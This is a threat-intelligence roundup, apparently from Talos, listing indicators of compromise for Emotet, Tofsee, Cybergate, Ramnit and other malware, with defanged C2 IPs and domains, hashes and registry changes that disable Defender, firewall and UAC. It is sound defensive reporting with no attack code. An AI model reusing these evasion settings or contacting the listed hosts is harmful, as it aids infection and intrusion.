Friday, June 12, 2020

Threat Roundup for June 5 to June 12


Today, Talos is publishing a glimpse into the most prevalent threats we've observed between June 5 and June 12. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:
Threat Name Type Description
Win.Packed.Emotet-8000624-0 Packed Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros sent as attachments on malicious emails.
Win.Dropper.Tofsee-8000771-0 Dropper Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages to infect additional systems and increase the overall size of the botnet under the operator's control.
Win.Malware.Cybergate-8011083-1 Malware Cybergate, also known as Rebhip, is a remote access trojan that allows attackers to fully control the target system. Functionality includes command shell interaction, screenshot capturing, audio/video capturing, keylogging, as well as uploading/downloading files from the target system.
Win.Dropper.Ramnit-8004725-0 Dropper Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.
Doc.Dropper.Sagent-8005726-0 Dropper Sagent downloads and executes a binary using PowerShell from a Microsoft Word document.
Win.Dropper.Remcos-8008767-0 Dropper Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.Kuluoz-8010459-0 Dropper Kuluoz, sometimes known as "Asprox," is a modular remote access trojan that is also known to download and execute follow-on malware, such as fake antivirus software. Kuluoz is often delivered via spam emails pretending to be shipment delivery notifications or flight booking confirmations.
Win.Trojan.Fareit-8010489-0 Trojan The Fareit trojan is primarily an information stealer with the ability to download and install other malware.
Win.Trojan.Zbot-8013884-0 Trojan Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.

Threat Breakdown

Win.Packed.Emotet-8000624-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER
Value Name: 98b68e3c
5
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\FXSXP32
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\KBDHE
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TRAFFIC
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WMITOMI
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TRAFFIC
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC 1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC
Value Name: Type
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC
Value Name: Start
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC
Value Name: ErrorControl
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC
Value Name: DisplayName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC
Value Name: WOW64
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC
Value Name: ObjectName
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NETBTUGC
Value Name: Description
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\TERMMGR
Value Name: ImagePath
1
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MSFEEDSSYNC
Value Name: ImagePath
1
Mutexes Occurrences
Global\I98B68E3C 5
Global\M98B68E3C 5
Global\Nx534F51BC 2
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
84[.]21[.]179[.]51 12
98[.]15[.]140[.]226 5
200[.]119[.]11[.]118 5
95[.]216[.]118[.]202 5
103[.]83[.]81[.]141 3
239[.]255[.]255[.]250 2
51[.]159[.]23[.]217 2
80[.]11[.]158[.]65 2
190[.]229[.]148[.]144 2
190[.]47[.]227[.]130 1
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\BWContextHandler 1
%SystemRoot%\SysWOW64\FXSXP32 1
%SystemRoot%\SysWOW64\WMVCORE 1
%SystemRoot%\SysWOW64\stclient 1
%SystemRoot%\SysWOW64\bidispl 1
%SystemRoot%\SysWOW64\DeviceUxRes 1
%SystemRoot%\SysWOW64\dinput 1
%SystemRoot%\SysWOW64\QSHVHOST 1
%SystemRoot%\SysWOW64\spopk 1
%SystemRoot%\SysWOW64\NlsData0026 1
%SystemRoot%\SysWOW64\ole2 1
%SystemRoot%\SysWOW64\dllhost 1
%SystemRoot%\SysWOW64\api-ms-win-core-timezone-l1-1-0 1
%SystemRoot%\SysWOW64\IPHLPAPI 1
%SystemRoot%\SysWOW64\mswstr10 1
%SystemRoot%\SysWOW64\WindowsAccessBridge-32 1
%SystemRoot%\SysWOW64\dxtrans 1
%ProgramData%\SwfnUY.exe 1
%ProgramData%\fTVMRHwlNGMMSS.exe 1
%ProgramData%\FDucHSCiYJfTOmHlx.exe 1

File Hashes

1663ff02929849037741e79d4a0b85f6ff5adaddc3a0e2df29dc6d66e8988274 3c3c9829356d10288efb6674c83bafca4566bb9c284e165e27fb45e738998e7c 43b322ced37400108fddbf7be482d34506cd59f1ccfd638c06eee010f1621343 48d78774374d54a4e7c49b62e75069abd2963d577149a7c654ca731d5667a40c 73e92e28013cb71464d6e9d2ceffc1953d4944737fb90ba145fa025e7037094b 779528568c766ddb20b6f05eb8d01c4833d375b4f9b7f25a65e6fd9e1bddd588 879499f69389d5c9fec8ac35666a4e15660d467deba2e55af86bc096952ae1ab 8a0e412d060eed0fa3e8d8cabd07b9447b8c75f99cd32811abd370fd83166f20 bc41a9c735419ece9cbda8a405d3c1525af114ef7f14ab9f67ecaabe0bfc1f49 d13b9acb045da3c5984728f8f2f014155aa7fba23f719891c7d8fa5d98b082ae d93eae25ac2003e80c80d543fb6399e359f969c8389e6a15443e91527612d36a e1e83a795b910377a93ad80d9e2832314d1b4380471bceaa241d33da9b7819d3 e8d0c1b2dd8ea9e7233fe0d6dc724492086535064b20283852188ab533e7be66 e92c6a94ba34be5bd498a6609805cfbab3753e64ecd9b6b8b773b5c4bcaa883a f45e5a3f36690a43f6c16cc19bb21698ec4d108a6e3dafab496bf4ebdbda1270 f9a73d75181bc696e3c18f0c5f8772ff842ebe1ca156a6e892b6a50f7a34bc5c fe7d756c4e5590cd12ba89cfaeb5ef56d2b2242e452fd5db07a71bbe6b4ca5dd

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid


Malware


MITRE ATT&CK




Win.Dropper.Tofsee-8000771-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 99 samples
Registry Keys Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 99
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config2
99
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config0
99
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config1
99
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
91
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
39
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\rkyedlrg
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Type
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Start
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: ErrorControl
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: DisplayName
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: WOW64
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: ObjectName
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG
Value Name: Description
10
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\RKYEDLRG 10
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\fymsrzfu
8
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\slzfemsh
7
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\ibpvucix
6
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
239[.]255[.]255[.]250 99
43[.]231[.]4[.]7 99
69[.]55[.]5[.]252 99
85[.]114[.]134[.]88 99
217[.]172[.]179[.]54 99
5[.]9[.]72[.]48 99
130[.]0[.]232[.]208 99
144[.]76[.]108[.]82 99
185[.]253[.]217[.]20 99
45[.]90[.]34[.]87 99
172[.]217[.]15[.]100 82
47[.]43[.]26[.]7 66
104[.]47[.]59[.]161 64
157[.]240[.]18[.]174 60
188[.]125[.]72[.]73 56
104[.]47[.]54[.]36 54
104[.]47[.]53[.]36 45
69[.]168[.]97[.]77 45
52[.]11[.]241[.]224 45
208[.]84[.]244[.]10 45
67[.]195[.]204[.]80 44
64[.]8[.]71[.]111 43
63[.]240[.]178[.]216 43
62[.]42[.]230[.]22 42
69[.]172[.]200[.]235 41
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
microsoft-com[.]mail[.]protection[.]outlook[.]com 99
252[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 99
252[.]5[.]55[.]69[.]in-addr[.]arpa 99
252[.]5[.]55[.]69[.]bl[.]spamcop[.]net 99
252[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 99
252[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 99
252[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 99
schema[.]org 98
ipinfo[.]io 32
api[.]sendspace[.]com 32
lh3[.]googleusercontent[.]com 17
115[.]151[.]167[.]12[.]in-addr[.]arpa 14
kedaikurma[.]com 13
pemborongkurma[.]com 12
www[.]google[.]com[.]au 11
kurmakurma[.]com 11
buahkurma[.]com 11
www[.]spoonfedsolutions[.]com 11
kurmasupplier[.]com 11
www[.]epicgames[.]com 9
banghehoaphathcm[.]com 9
www[.]ls-art[.]cn 9
in[.]godaddy[.]com 8
sso[.]godaddy[.]com 8
www[.]sendspace[.]com 8
*See JSON for more IOCs
Files and or directories created Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 99
%SystemRoot%\SysWOW64\config\systemprofile:.repos 99
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 97
%TEMP%\<random, matching '[a-z]{8}'>.exe 93
%HOMEPATH% 35
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 35
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 10

File Hashes

0076985696450a53bbea8c33a65c206fb0a423f73195b8540aa557373fbc08e9 01b7d4e97517113c597da6031d27f99a1ccc1d90e2de4141ec35c293bc4d10ae 034565b76c88316b1b2da3c1a565678ce8bb4ffaef3a1715e3125014d5274a00 0594b598a01de66634e2b9e5939812c6766d7cc6aa8008a2d4b3ebeecf1f3516 0691149a02a727580ac8f3333892c6c5dfb23f44a1e7be5a84fa261ce34d9e72 09c205ed43b918d8497f764176d45d4195a5e0593b61366e5c5ad92ca153d504 09d26c3c8f049e762ba8bfd0f88e45280b27dc455672cb9774749847acae3ecb 0e2d52423bea4c0769172c25a44d4d8f2b4ecb16447c40cb7c897dc762f1735a 13584698f47019e94aa1944b01b60565c9a4bcf8d8c2d2108fe56c167b4aff92 150cceed02e521de80bc00a916b873fae518dd7bdc9ba16bcecba38750c471e5 1bafd5a668dc6ab6bdf3af8728cc466539025f2821532147ac5160e7e146ca0f 1cf5999bc1adcb1a58c7a8369efe850b97bb4a76c837756e9de950bf7790617e 1e5fff1d6c62e6abbfc8484d0ceae9cfe8de65400b7eace73c3ab90572504fa9 1ef892c4cb814ba11880768b707a3632b8b3fcf55adaa2cf876d8671ba3502fe 22b5f1eb683bb548666d4ce2aae89c1e8f7dab36593a6ee9445ccd065db1fff5 26e053f0fd8e0a1c7221b2867f87e458d2e8886e393a05063ac709ad9f58fcb8 26fe3630c44570d3ee0beff0191866b70af3a994333f568710448f2d7f8eacae 28e4c63850ecdb17737ebe8e02c2d8a12eeedd1a282d256168e3af10a4e85e9f 2966f82a71874484ae39f228d9c1d3267d4276d7af1aed8054fbe20f95b745f1 29b1ae5a5a1084b47db4457e74726909138c9ced7b96aafecd82647980b75bd8 2a9cd7ed9850b9f5ba3eb630f0049db52348de9e3a5062c0287bcafa516e8dcd 2d930ffab1399aaede80a5d4793a0fbf3c0cb1c07d0e0fc7cd08a4e5253cbcc5 2df80bff6616705969af949858a8bb19d4ff472ea1ba153f1380529afe29df8e 2f6704313c252a4075d5af31679130046f08ccb6f6c6b4c948d45491852f8026 331cc2c2ff6959ae22e912712688fcf9c89efd074bdd4a167f3699c726ad205f
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

AMP


ThreatGrid



MITRE ATT&CK




Win.Malware.Cybergate-8011083-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKCU>\SOFTWARE\REMOTE
Value Name: NewIdentification
26
<HKCU>\SOFTWARE\REMOTE
Value Name: NewGroup
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKCU
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
Value Name: Policies
26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: HKLM
26
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 26
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 26
<HKCU>\SOFTWARE\REMOTE 26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{4JR57H85-2Y1A-15MG-8AV5-C323Y4D6P58X} 26
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{4JR57H85-2Y1A-15MG-8AV5-C323Y4D6P58X}
Value Name: StubPath
26
<HKCU>\SOFTWARE\REMOTE
Value Name: FirstExecution
26
Mutexes Occurrences
Administrator5 26
xXx_key_xXx 26
5Y3QN4A45L8W35 26
5Y3QN4A45L8W35Administrator15 26
5Y3QN4A45L8W35_SAIR 26
5Y3QN4A45L8W35_RESTART 26
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
ratrat[.]no-ip[.]org 26
Files and or directories created Occurrences
%TEMP%\Administrator7 26
%TEMP%\Administrator8 26
%TEMP%\Administrator2.txt 26
%APPDATA%\98B68E3C 26
%APPDATA%\98B68E3C\ak.tmp 26
%APPDATA%\Administrator-wchelper.dll 26
\default.html 26
%ProgramFiles(x86)%\install 26
%ProgramFiles(x86)%\install\server.exe 26

File Hashes

01b133f5e10b71f33f117a59e78836294341f26318747f5a504aa2bf2af7869c 029d9e96045543dde92fcfc3e0850a1056bfe04f583d9d83c3f187d5db2d30a6 06c9eeaf4b22ccc75f29da153dfa87ca1c3759a5bfb3b688813a07c78cf9cf5a 06dd14844f1219660dd4f18b30ff70289ece23be61938842299cbb0bdfe2cba6 11cd8e3e83744af76e4e3906f7f06a549fe7e49a6ec61a14678f25d7d01509be 1a6c0121d371ad7225ec0fd2c524979e30a57b3eef24676781cf631d704f0ec4 1cc729e873bc0ccc68b2cef59562a5196793c0511b05f952a096ce87c27bb02f 1e7963141202ea5535603b0239828a6e77613948e8e73b56f48a8d9e958c5744 1fc80523bb4a2290e683303ddad3f413079a320c0f23e055531b6ea543dcfc9c 21d5baf434ba1e61c0d24cc2c49d91e7bae8204d4a69a614dd81193ba2901a1d 243344e8c4defcf6d918ac46233381c21f2530f162962e8bf8fb384c341035be 2fd297ddc4fb433b09adb0894aa7752fc3433a360597e23c5025250cd062e801 36806975e01188ab35484d5b3e119fa74fc8feebf99d400ed5fa9ac9fbf250f6 3851caf965504e6d99ad2d541af43f8f4213c6ddaa460b8e7b812e2fdb299316 3b2a0d95b9643dcb1dfa555d9e79fbfbc27e98667014bdd79ff5b9e5c2f72c79 4876314e5d223a296b8aa95fb5eb97859da5bcbf78da9e78674b28f4536cd591 497cebdc6a2b1b3a3948f94871de8ef1c2ac64e14a4d35c73e136b1f9ed12405 4dcb2bd6dc558fb9290f40656e630190658787f29455d5c73d459f0dee312c15 5a18e22eefd2d2492491d9001ea3d258f56cb8735576b021bc1e5bc2e6a0f3da 5b3adb4375bd0075be28205ca71ddbf4276b83bbca9b66cdb9ee82bed8682891 612f9221336c5c7673f1fa6ae3e720d154089cb01a5c15265645bb89cc2b038a 64fa90ed57415dc00be6733a81c531f028324e897bc17e8b4de16f8085c4a113 6b53e1a9fb4188b1440725ffa1f282fdf9676942729324a33870461c1cfa1915 6d0ce22174d45918ad313403aaeba8d38bbe59df1af2c09d8abb00d549251458 7837bec42372c23bf413c3a6c533c88f728a73df19f36f2576a7d1424a4163b1
*See JSON for more IOCs

Coverage

Product Protection
AMP This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat Grid This has coverage
Umbrella N/A
WSA N/A

Screenshots of Detection

AMP


ThreatGrid


MITRE ATT&CK




Win.Dropper.Ramnit-8004725-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 26 samples
Registry Keys Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusOverride
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: AntiVirusDisableNotify
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallDisableNotify
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: FirewallOverride
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UpdatesDisableNotify
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
Value Name: UacDisableNotify
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
Value Name: EnableLUA
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: EnableFirewall
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DoNotAllowExceptions
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
Value Name: DisableNotifications
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
Value Name: Start
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MPSSVC
Value Name: Start
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION
Value Name: jfghdug_ooetvtgk
15
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: JudCsgdy
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
Value Name: Start
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Windows Defender
15
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
15
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
Value Name: Userinit
15
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
11
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
8
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
8
Mutexes Occurrences
{7930D12C-1D38-EB63-89CF-4C8161B79ED4} 15
{137A1518-4964-635A-544B-7A4CB2C11D0D} 15
{137A1A2C-4964-635A-544B-7A4CB2C11D0D} 15
{137A2419-4964-635A-544B-7A4CB2C11D0D} 15
{137A1A2D-4964-635A-544B-7A4CB2C11D0D} 15
{137A1956-4964-635A-544B-7A4CB<random, matching [A-F0-9]{3}>1D0D} 15
{<random GUID>} 3
Global\8B5BAAB9E36E4507C5F5.lock 1
Global\XlAKFoxSKGOfSGOoSFOOFNOLPE 1
Global\ADAP_WMI_ENTRY 1
A16467FA7-343A2EC6-F2351354-B9A74ACF-1DC8406A 1
Local\{41435A30-AC43-1BEB-BE05-A07FD209D423} 1
A238FB802-231ABE6B-F2351354-D385FF30-098C3AB3 1
IP Addresses contacted by malware. Does not indicate maliciousness Occurrences
195[.]201[.]179[.]207 15
172[.]217[.]197[.]100/30 9
239[.]255[.]255[.]250 8
43[.]231[.]4[.]7 8
69[.]55[.]5[.]252 8
85[.]114[.]134[.]88 8
217[.]172[.]179[.]54 8
5[.]9[.]72[.]48 8
130[.]0[.]232[.]208 8
144[.]76[.]108[.]82 8
185[.]253[.]217[.]20 8
45[.]90[.]34[.]87 8
204[.]11[.]56[.]48 7
157[.]240[.]18[.]174 7
216[.]239[.]36[.]21 5
172[.]217[.]197[.]106 5
31[.]13[.]93[.]174 5
172[.]217[.]197[.]147 5
172[.]217[.]197[.]99 5
107[.]162[.]167[.]124 5
216[.]239[.]34[.]21 4
69[.]31[.]136[.]5 4
104[.]47[.]54[.]36 4
104[.]47[.]53[.]36 4
192[.]0[.]57[.]109 4
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousness Occurrences
avdltaiyjuq[.]com 7
hvkteatvnctsgrie[.]com 7
pfbewidqgfiqyiqty[.]com 7
ywsnjjpqkispu[.]com 7
tjulsbbek[.]com 7
vytjhlqwqrvh[.]com 7
yijlxkulyqfcgfecneu[.]com 7
skajloyxmlslvqkgl[.]com 7
rkwqxdlhwsbpsoiipkl[.]com 7
xvgcseraxtla[.]com 7
vxasusphxwkdktm[.]com 7
gknjlhmla[.]com 7
mgjwtsur[.]com 7
dabrtqen[.]com 7
vlnpjwrvmjqyh[.]com 7
yractfrwrctboagip[.]com 7
uhhoatxt[.]com 7
sgpyhxnpfjibwlnpvtw[.]com 7
oivkottogwc[.]com 7
vbfoafix[.]com 7
qdushgtbk[.]com 7
svncqqalq[.]com 7
tfsehgbwfav[.]com 7
dqondfminqxdaewoxy[.]com 7
vdwokjfvcttatm[.]com 7
*See JSON for more IOCs
Files and or directories created Occurrences
%TEMP%\guewwukj.exe 15
%TEMP%\yowhywvr.exe 15
%HOMEPATH%\Local Settings\Application Data\hmqphkgx\pseqpmjy.exe 15
%HOMEPATH%\Local Settings\Application Data\jpnfmrvn.log 15
%HOMEPATH%\Start Menu\Programs\Startup\pseqpmjy.exe 15
%ProgramData%\wtvakgao.log 15
%LOCALAPPDATA%\bolpidti 15
%LOCALAPPDATA%\bolpidti\judcsgdy.exe 15
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\judcsgdy.exe 15
%TEMP%\<random, matching '[a-z]{8}'>.exe 11
%HOMEPATH% 9
%SystemRoot%\SysWOW64\config\systemprofile 8
%SystemRoot%\SysWOW64\config\systemprofile:.repos 8
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 8
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy) 8
\$Recycle.Bin\<user SID>\$<random, matching '[A-Z0-9]{7}'>.txt 1
\$Recycle.Bin\NTHLE-DECRYPT.txt 1
\$Recycle.Bin\S-1-5-21-2580483871-590521980-3826313501-500\NTHLE-DECRYPT.txt 1
%HOMEPATH%\98b689dd98b68e3c2d.lock 1
%HOMEPATH%\AppData\NTHLE-DECRYPT.txt 1
%APPDATA%\98b689dd98b68e3c2d.lock 1
%APPDATA%\Media Center Programs\NTHLE-DECRYPT.txt 1
%APPDATA%\Microsoft\Internet Explorer\NTHLE-DECRYPT.txt 1
%APPDATA%\Microsoft\Internet Explorer\Quick Launch\NTHLE-DECRYPT.txt 1
%APPDATA%\Microsoft\NTHLE-DECRYPT.txt 1
*See JSON for more IOCs

File Hashes

0b490cb9ea3ba9b59b7acc74882639791a547ce9e7d9e3215cf28661e746ee08 11f697b19a583973236c5deacfc31dd9ff441045d495a68857373b14e95f449e 151f0e9786d903c3831e7555a64b980ae7fb8514f58d1044017b82276aae0d08 21925ad39855bfa10ffc15fb35dcbfaf652ceb2b72d247b3d04e17a370bb5124 2e95a39f9ecc3f8c22b7fe785393eccc37326ccb84f984eaca9f06c51120ab1d 6a793585958d4db348868417923c49a74d6b0e053c8a914669e980a9f06901c6 6c3e1a2ae98ec30890ef5a8640f0130fa0ead136852ed5a9fe452f6ac3c01dba 75350b7659af658758e04bf2d15172e405e8cc2158dfda64bcd6a513aeee9269 75d9881c6670d6e23fc962532a6c4ae2d23f816f59f88d93131d81400dcea15b 7952e478a1c6df2378e2174e83c69608401c46526efff974484c719ba44f19dc 7a77148fafd2bb5a47ccb12d800e9d9e190554c5cb774e62dd519d19639723b4 7dec40a48b029de50868b1a85573fd1d566084d0ee4935acfb30887e30d1de06 7fe04f0111eebfeb1d602a42d78c80a48c2d4e9f139a1b432822ce2e549eb2ba 84ec757a84f0b5da11955b24486d1be60e7c6eeb2f5b8b4de656a2e498e9184b 9e8e5e20c1ac022c559a68d8ed67a7879ad68a917d4f97459bff72840bdba457 